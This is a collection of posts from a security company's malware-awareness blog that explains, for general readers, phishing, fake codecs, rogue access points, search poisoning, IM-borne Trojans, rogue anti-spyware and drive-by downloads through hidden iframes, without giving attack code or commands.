Welcome!
I am very pleased to see the Malware Diaries now online.
I have been working in the security industry for a little more than two years now. It is definitely a very captivating and challenging place.
The SWAT team here at Paretologic is responsible for Malware Research and Database Updates. Our job is to find the bad stuff floating on the Internet and analyze it in our lab before adding detection signatures to our security products.
We actively seek malware with different tools which consist of traps (also known as HoneyPots). as well as human research.
As you may imagine we get to see a wide variety of threats from simple social engineering attacks to very well crafted exploits.
The malware diaries will tell you various stories about online security. The purpose is to be informative, accessible to the novice and interesting to the expert. My partner in crime Jean Taggart will share the pen with me along the journey.
Feel free to browse as you wish or use the menu on the right side to pick a category. We welcome your feedback.
Enjoy! 
J. Segura
Computer Security Analyst, Malware Diaries author
——
Hello world!
My name is Jean Taggart and I am a computer security analyst here at Paretologic.
I firmly believe that “patching” the end user is a good thing. That is essentially what we do when we inform someone through our blog postings on the seedier side of the net. When we describe how a scam works, explain how the bad guys are trying to fool users in parting with their hard earned money, we disarm them.
I have seen the threat landscape change dramaticaly over the past few years. From adware that you could simply uninstall, soon followed by programs that intentionnaly obfuscated their file names and how they hooked into the registry, and eventually applications that have monitoring processes and exhibit rootkit like traits.
If we can entertain you at the same time that we inform you on these emerging threats, so much the better.
Jean Taggart
Computer Security Analyst, Malware Diaries co-author
|
Gone Phishing…
More and more sensitive information is exchanged online, so much so that, most of the time we don’t realize it. We log into our email account(s), our bank sites, our eBay account etc. Every time we do that, a transaction happens. We send in passwords, usernames or credit card numbers onto an external server. Of course, we know about why it is so important to choose a strong password, but do we know it is totally useless if we cannot trust the recipient we are sending it to?
That is where anyone can I exploit that trust. Phishing is any action made to fraudulently acquire private information by pretending to be a real and trustworthy entity.
Very soon, hackers have realized how much value there was in doing Phishing scams. Stealing somebody’s credentials can give full access to very private information and basically be in total control of someone’s life (provided that the person does some online banking, logs into her healthcare site and so on).
There are many ways to carry out a phishing scam. First of all, the victim needs to be contacted in some way. It could be from an email, that leads you to a fake site, or it could be from a typical malware infection, that hijacks the web browser and redirects it to fraudulent
websites whenever the victim types in the URL, or clicks on a bookmark.
Secondly, because the phishing site will be hosted on a different domain than the real one, the hacker needs to trick the
Figure 1: phishing site targeting Facebook users. Notice the URL ending in “.cn”
user into believing this is the correct URL. A classic example is to
slightly modify the domain name. Also, typos are commonly used.
Real: www.google.com
Fake: www.go0gle.com
Real: ww.facebook.com
Fake: www.facebook.com.profile.php.id.37122.cn
Another technique called website forgery involves the use of scripts to
alter the address bar. The legitimate address bar can be closed in order to display a hacked one. More simply, a JavaScript can be used to display a picture in place of the address bar, so that everything looks legitimate.
Let’s take an example of a Phishing scam targeted at Facebook’s users (Figure 1).
A similar face plate is created, that looks identical to the legitimate one. The URL in the address bar is slightly different, but the average user may not notice it. In fact, this page is hosted in China.
Then let’s enter the email address and password in the form. Figure 2 shows that the credentials are being sent to the phishing server somewhere in China.
Interestingly enough, after entering the login information, the real login page for
Figure 2: data transfer between the client and the malware server
Facebook is loaded this time. The user might just think she typed something wrong and re-enter the login again. Now, it will work and most likely the user won’t have noticed a thing.
Meanwhile, a hacker has received a valid email address that he can use for spam, not mentioning that he can log into the Facebook account at any time. However, there is something even better he can get access to, with a bit of luck. A lot of people use the same password for the different services they long into.
Now, the hacker gets into your personal email account. Due to the larger storage available, people don’t bother deleting old emails. This is a gold mine for hackers. They will do a simple keyword search (“password”, “credit card”, “confidential”), and find even more juicy stuff.
The conclusion to this story is that Phishing is a real and dangerous online threat. Although efforts are being made to protect users, the problem is so large that not one solution can fix it.
Internet Explorer 7 does include a filter capable of detecting phishing sites. But it’s not 100% trustworthy. There are public groups combating fishing and reporting live stats as well as taking them down. The PIRT (Phishing Incident Reporting and Termination) team at Castlecops.com is one of them doing a very good job.
Ultimately, this is something that users will have to become familiar with and more vigilant. Effectively blocking spam emails which are full of phishing scams would be a good start. Browser add-ons or applications running in the background can also detect in real time dangerous websites and block them.
Jerome Segura
|
Codec invasion
A codec is a program needed to play certain types of media files. You may have come to know them when you downloaded a movie but couldn’t play it because a codec was required. Popular formats such as DivX require certain software for playback. The advantage of codecs is they usually let you play high quality media files while keeping their size much smaller than Windows default WMW format.
Some websites use special codecs to stream video, YouTube uses Flash to stream theirs The major players like Apple or Sony also use proprietary formats.
The problem is we are flooded with tons of file formats, codecs, etc. To watch the latest YouTube video on your ipod, you will need to use special tools to convert the media into something readable.
I guess malware authors saw this as an opportunity to launch their own codecs nicely bundled with nasty Trojans. They focus on pornographic content, a good bait that will work on a large scale.
Hackers trick the user into installing the codec in order to view the video. Once installed the codec will launch its payload: an explosion of pop ups, rootkits, fake anti-spyware programs which bring the machine to a crawl.
Figure 1: after installing a fake codec
A common trick is to use YouTube-like content. Logos, YouTube video player… It makes the user feel more at home and gives them the impression they’re doing something familiar.
Figure 2: YouTube knock-off
Figure 3: a familiar player with a prompt for a codec download
Figure 4: the codec installer which bundles Trojans
Those codecs are created on demand, so to speak. Each time you visit the webpage, a new identifier is created. (Figure 5)
Figure 5: URL changes constantly
In order to avoid signature detection by AV products, the codecs are packed with a different MD5 every time the user will download them. MD5 is a cryptogrpahic function to check the integrity of files.
An MD5 hash consists of 32 hexadecimal characters. (i.e. F57E5CAE3AA7E90BD79D18720FFC6C58)
Figure 6: md5 signatures are different for each codec
A traditional AV product will search for the MD5 and if it doesn’t find it, the file will be allowed to execute. It’s nearly impossible to keep up with the production of new malware samples, and logically it doesn’t really make sense to bloat up a database with millions of MD5s.
That’s where heuristic detection can come in handy. It is not based on precise identification but looks at different aspects of the binary. For example, unusual settings in the headers of a Windows executable may indicate a possible sign of malware. This technique has some drawbacks though because of false positives risks. It is very easy to wrongly identify legitimate files as being bad.
Realtime blocking can help as well, when it blocks a process from doing things that may affect the system. Once again, it requires a lot of fine tuning to avoid false positives.
The best protection against those fake codecs remains being cautious. Your own judgement is better than any antivirus program. If other users utilize your computer, you can also set them up with guest accounts. Such accounts have limited privileges and they act as a shield in front of the Operating System and its core components.
Apple’s Mac is now being targeted as well by the fake video codecs.
It’s not often we see a crossover to a different platform, but this clearly shows how popular it has come to be.
Jerome Segura
|
Don’t bank over public WiFi.
It’s pretty simple, isn’t it?
Too many times I’ve seen people who connect to their local hot spot, at the coffee shop, log into their bank, and conduct important personal business.
Now, don’t get me wrong, I’m all for the convenience of ubiquitous wireless internet access. I think that there’s nothing quite as cool as looking something up in google while sipping on my grande-latté-2-pumps-of-vanilla, but online banking credentials have a definite value in the eyes of unscrupulous criminals, and when they are flying through the air, anyone with the necessary knowledge can snatch them.
Admittedly, my paranoia knob “security dial” is set pretty high. Perhaps this is as a direct result of working in the security field. Let me elaborate and provide a concrete example in the process. A common ploy, one that is not that technically difficult to achieve, is to sit at a location that has public wireless access with a laptop that has been configured to act as a wireless router, and relay the traffic to the legitimate wireless router. This is often referred as a rogue access point.
Say for example that this location is a coffee shop. In this fictitious example, we’ll call the wireless router: Coffee_Free. The malicious criminal would then create a Coffee_free2 router, and simply wait for unsuspecting patrons of the coffee shop to connect to his laptop. He would then intercept all their traffic. Once you have intercepted the traffic generated during a banking transaction, you can dissect it at your leisure, and extract the information needed to acquire said banking credentials. The rogue access point is even more effective if the wifi web access at the coffee shop is a paid service, as the rogue access is free, and will probably attract more patrons than the legitimate one!
Remember, this method of stealing credentials applies for any web based exchange that involves some form of authentication. Is your favorite instant messenger automatically logging you on? Your credentials are involved in that process. Checking you g-mail? That information is intercepted too…
On the subject of e-mail credentials, don’t think that just because it’s a web based email, it does not hold value to criminals. If they own your email, they can get access to any other services where you used that email address to register. The g-mail search features makes finding this information even easier. Users also have the bad habit of using the same password for several different services. A skillful attacker will attempt logging in other services using the same credentials in a bid to gain further information. We have even seen black hat tools in the wild that help automate this process…
So what should the average user take from this? Don’t bank over public WiFi.
There’s no point in looking for a dodgy looking fellow with a “got root” t-shirt, rubbing his hands together with glee at the very far end of the coffee shop either. His laptop is in his car, in the trunk It’s parked besides the coffee shop, and he’s gone shopping. Possibly with your money.
Don’t bank over public WiFi.
|
Google poisoning and impersonations
When we look for something on the Internet, most of us will think of using Google’s search engine. Actually for a lot of people, the Internet starts with a Google search. Google quickly surpassed its competitors and has established itself as the reference in terms of online searches.
With a mission of presenting the best results as quickly as possible comes a certain responsibility. Indeed, we, as Internet users, trust Google to guide us to links that are safe and match our search query. That same trust we have when we see the Google logo can easily be used by hackers to design Google templates that look like the original, but are in fact dangerous websites.
Should we blame the giant search engine if we land on a malicious page that infects our PC after clicking on one of the links? Legally, we may not, but if this situation happened too much, we might get fed up and start using another search engine.
There has been a lot of talk recently in the media about Google poisoning. Basically, hackers hijack Google’s search results so that their malicious sites appear in the top ten results. Hackers create tens of thousands of sites specially crafted for Search Engine Optimization which somehow find their way to the first results’ page.
Figure 1: malicious page appears on Google. Thousands of those pages can be created in a matter of minutes to flood the other legitimate sites.
To give the search engine credit, Google is trying to remove those links as soon as it can. It also flags a lot of sites as dangerous and prevents you from directly visiting them. Stopbadware.org has done a lot of work into listing dangerous sites and gives webmasters explanations and tips.
Lastly, Google is not the only victim of search results poisoning. Microsoft’s Live Search
has had its fair share too.
Figure 2: a warning from Google: “This site may harm your computer”
The other problem, although this time totally out of the hands of search engines, is lookalike sites. This paper will not talk about the larger problem that is phishing whose main goal is to capture sensitive information (username/password, credit card number etc.) by using social engineering and other technical subterfuges.
Figure 3: Real Google page
Figure 4: Fake Google page
Let’s take a closer look at the fake Google webpage. There are several areas that have been changed. Although visually it looks pretty close to the original, the source code clearly shows the work of a hacker. An obfuscated JavaScript will try to launch an exploit. Also, as if it was not enough, an add-on is required to do the ‘Google’ search properly. The add-on is actually a Worm that will infest the PC and propagate to other machines.
The icing on the cake (at least for us malware researchers) is the redirection to the AdultFriendFinder website, when clicking on the Sign in link. Normally, this takes you to a page where you put your username and password to log into your Google account. Instead, you will land on an adult site.
Figure 5: Source code for the Fake Google page. Notice the part that says “secret code”… This is obfuscated JavaScript that hides malicious code.
Figure 6: Social engineering trick to download and execute a Worm.
Figure 7: The Sign in link actually redirects you to AdultFriendFinder.com
Figure 8: AdultFriendFinder.com sponsored by a pretty dubious affiliate
It is no big surprise that hackers target Google. Millions of Internet users depend on the search engine everyday for their work or personal research. There is also a lot of money involved in Search Engine Optimization (SEO) because businesses heavily rely on being listed by Google. So many tricks have been used (and certainly will keep on being used) to increase a site’s ranking. Better ranking means better traffic, which translates into
sales.
Well, hackers are getting really good at SEO, and it opens the door to millions of potential victims. The hackers can then contact the Adware / Rogue companies and make a deal to deliver their products through their ‘sales channels’. It is certainly a bad practice, but again, having a good conscience is not very high on their priority list.
Jerome Segura
|
Instant Messaging Threats
Instant messaging programs are used at home, at work or on the road and they’re a great way to keep in touch with friends/family, meet new people or just waste time. They are fairly easy to figure out, and people of all ages are on them. The most popular ones are Yahoo! Messenger, Windows Live Messenger (formerly MSN messenger), ICQ, AIM (AOL Instant Messenger). Most feature file transfers, webcam and voice functionalities, as well as traditional text chats.
Every now and again, we hear about the dangers of online predators who, under fake identities, try to lure kids into giving them personal information and more. That is definitely a concern for all parents to have. Kids don’t always realize that there are disturbing and sick people out there, looking for their next victim.
Parents should not only be concerned about their kids, but also themselves or anyone for that matter.
Instant messaging is a very easy way for a person to spread malicious programs very quickly. In a sense it can be compared to email with malicious file attachments or dangerous spam. Both rely on social engineering techniques, which is basically using tricks (free stuff, porn etc.) that people will fall for.
In our SWAT department we researched a little bit how this all works. We created a “bait” account, which allowed us to advertise ourselves under a typical identity. Rapidly, we had a lot of people adding our profile to their friend list. Soon, the trap worked its magic and we received our first message:
Figure 1: Infected file transfer
The file sent to us was zipped and contained a Trojan. The kind of program that can infect your PC in many different ways such as installing a keylogger to secretly capture your keystrokes, or modify your Internet browser to redirect your searches to an affiliate site. You may assume that whoever sent you this instant message is evil. Well, in most cases they didn’t. There very well may have been no one in front of the computer. An already infected machine can send spam and instant messages automatically, without the user’s knowledge. This is called a Bot, a compromised PC part of a group of PCs (a Botnet), participating into illegal activities.
Another social engineering technique is to send an IM with a link to a malicious website. We also received one sample that we analyzed:
Figure 2: IM with malicious URL
The trick is to have the person click on the link to see the promised naked photos or whatever the bait is… The site in question hosts malware, and will infect most users’ PC with a drive-by download as they land on it.
Our study would not be complete if the entire infection process wasn’t exposed. Our test machine got infected, and to our surprise and “excitement” we noticed we were sending to all our good contacts the same malicious link!
Of course, we quickly stopped this because our experience was successful enough and we did not want to be part of a botnet.
Jerome Segura
|
Rogue Software
Rogue software has taken advantage of the publicity and fears around Spyware and Adware and relies on convincing or forcing people to buy the product in exchange of getting rid of the problem.
Rogue software is nothing less than a big scam, playing with people’s fears and claiming all sorts of things as long as your purchase their so-called product, because in most cases there is no problem to cure on the PC.
In our SWAT department we have seen countless applications that fit this description.
Some of them are pretty basic and not very well designed at all, while others are very professional looking. Overall, we are impressed by the efforts put into the advertising and how well crafted some of these programs are. Although we feel very sorry for the victims, we can’t help but have a smile when we see a variant of a popular rogue software with just a new logo, but the exact same user interface. Or when the Help section is written so poorly that we wonder
which nationality the programmer was.
From our experience, we can say these applications basically target two markets:
illegal pornography and virus/Adware/Spyware infections.
There are other rogues (registry cleaners, and other utilities) but they are not as common. We can distinguish two means of installation:
through banners or pop-ups… and forced installations brought by a Trojan Downloader.
Pop-ups and other banner ads:
Advertising is done on all sorts of websites. Even some sites, which you’d think are legitimate let it happen. For example, a popular ecard website would generate a pop-up for DriveCleaner on its main page. The pop-up claims that the user’s PC in infected with a dangerous Worm. Although this is totally untrue, a small percentage people will actually believe it and follow the instructions on screen and end up paying money as well as giving their credit card number to a totally non trusted entity.
Figure 1: pop-up for DriveCleaner
Another type of pop-up is frightening the user that porn material is on his computer. Notice the “Teen (underage?)” in Figure 2 to scare of possible jail consequences.
Figure 2: pop-up for porn content
Figure 3: pop-up for Privacy Protector
Going one step further, we have noticed instances of pop-ups looking very much like a real Microsoft Windows XP interface.
Figure 4: Pop-up using Microsoft Windows XP style
Lastly, let’s mention that rogues are not affected by the language barrier. We found Winativirus Pro localized
in about 10 different languages.
Forced Installations:
This is actually the part that makes our day in SWAT, when a totally unwanted program gets forcefully installed and keeps bugging the user to register. When pop-ups are no longer effective, pushing rogue software though exploits
becomes lucrative. A compromised website, or a fake video codec may bring the user many unwanted programs, and very often rogue software will be there.
In the case of a web-based infection, visiting a malicious website will trigger a drive-by download. The threat can download additional malware, and rogues are known to piggy-back with other programs.
Although most malware will run silently (keylogger, stealing Trojan…), it is in the interest of the rogue program to catch the user’s attention. Warning messages, pop-ups, change of desktop wallpaper etc.
Figure 5: A warning from BraveSentry
Figure 6: the current wallpaper gets replaced with a pitch black screen
All these techniques contribute to the sense of panic the user is going to experience. Getting rid of the software manually can be a daunting task. Not only did the program
come totally uninvited, it will stay on the PC like flees would on a dog. This is because, malware present on the computer will check periodically for the presence of the unwanted components, and if not there, will reinstall
them.
Some people will decide to buy the rogue software because they can’t take it any longer. This is obviously a bad decision, as most rogues have absolutely no back-end
programming, which basically means there is nothing more than a pretty user interface with big buttons and colours. The product is a fake and totally incapable of doing anything.
Conclusions:
There is no end in sight for rogue software. The list will keep on growing because there is money to be made. The names and logos will change but the same scams are still going to affect many users.
Figure 7: Message from winfixer.com and the infamous rogue called Winfixer… Software out of stock???
Jerome Segura
|
The hidden part of the web
The Internet has many facets which are difficult to quickly summarize but for the most part, people assimilate it with email, online shopping, blogs, multi-player games and so on…
All those activities are brought to us by a web browser which renders the code used to build each webpage. We rarely ever get to look at what is behind a page. Whether a site is using Java, Flash or is just a plain Html document, it doesn’t really matter to us. What we care about is that it looks good and it is easy to navigate.
Sometimes an apparently legitimate site will trigger an explosion of pop-ups or bring our computer to a crawl for no apparent reason. The problem is, we didn’t really see what happened because it was done “in our backs”.
In this paper we will go deep into the core of a webpage and expose the dangerous code responsible for infecting PCs.
A common expression used by security researchers is ‘drive-by download’. In a nutshell, it means that a download happens without the user’s knowledge. Another popular notion is ‘exploit’ which is a piece of code or commands that take advantage of a
bug or vulnerability in any application or Operating System with the intent to gain control of the machine.
Although a drive-by download is usually triggered by the user’s actions, it is not done willingly or wanted. Also, the sequence of actions following up a drive-by download can be done silently and stealthily to avoid the user’s awareness.
We will focus on browsing the web, as the main vector for drive-by downloads to occur. As mentioned earlier, web pages consist of lines of code that are interpreted by the web browser (Internet Explorer, Firefox). Most of the time, the code used is totally legitimate and actually makes the web page more user friendly and gives it many different functionalities. For example, some code will be able to determine what browser the user has, what the screen resolution is, etc. Therefore the webpages interact not only on their server side, but also locally on the client side which is the user’s PC.
IFrames
An Iframe is an HTML element that enables to embed a HTML document within an already existing one. Iframes are often used to insert ads within a webpage. To make it sound more simple, it is what Picture-in-Picture is to the TV. The dimensions of the
Iframe can be set up manually, which is an important point to mention. Hackers use Iframes as a way to embed a malicious website into a legitimate one.
Because hackers do not wish the users or even better the webmaster to notice them, they usually set their size as 0 for both width and height.
Figure 1: Two IFrames are inserted into the source code of the webpage.
JavaScript Obfuscation
Although Iframes are difficult to spot, malware authors want to make sure they are not detected by search engines and other security tools. One way of doing this is to write a piece of code containing an Iframe and obfuscate it so that it is not easily readable.
A lot of webmasters will actually legitimately use JavaScript code to protect the copyright of their website’s source code.
Unfortunately, the browser will decode and execute the code regardless of its intent.
Figure 2: Obfuscated Javascript hides a malicious URL
Other JavaScript malicious code
JavaScript enables a malware author to run malicious code on the victim’s computer. One example of this security problem is called cross-site scripting. It happens when an attacker can force a legitimate site to include a malicious script in the page presented to the current victim. (Note that the same legitimate website accessed by a different person on another computer is totally legitimate, which is different from a permanent Iframe infection that affects everyone accessing the site).
For example, if a user logs into his online banking website and at the same time opens up
another webpage, that second page can load malicious code and take control of the
banking website.
Figure 3: poorly written malicious JavaScript
Pure exploits
Exploits, also known as attacks, take advantage of software vulnerabilities. As alarming as that sounds, there are many known exploits still unpatched by Microsoft or other software companies. Blackhat hackers are constantly looking for new ways to find a bug in the common software or Operating Systems. Some exploits are released in the wild (out there on the Internet) before anybody has a fix for them. They are called ‘zero day exploits’.
Although we can patch our PCs for older exploits, we are still vulnerable to the zero-day ones.
Types of exploits include memory overflow, SQL injection, and other types of code injections.
Figure 4: a malicious DLL file caused an exception in Internet Explorer 7
As we saw, malware authors are using all sorts of techniques to distribute their malicious code. It’s not always in their interest to make it visible to the user. For example, some credit card or password stealing Trojan relies on being stealh and undetected.
There are many hot debates on which browser is most secure. After all, the browser is your gateway to the Internet. There is however a general consensus that Internet Explorer is one of the most unsafe browser. Because it is the default browser on Windows machines, it is heavily target by hackers. But vulnerabilities are not unique to Microsoft products, and concern everybody. Firefox, often praised as the most secure browser, has had its share and periodically patches itself up.
This is just a reminder that the online safety battle is far from being over.
Jerome Segura
|
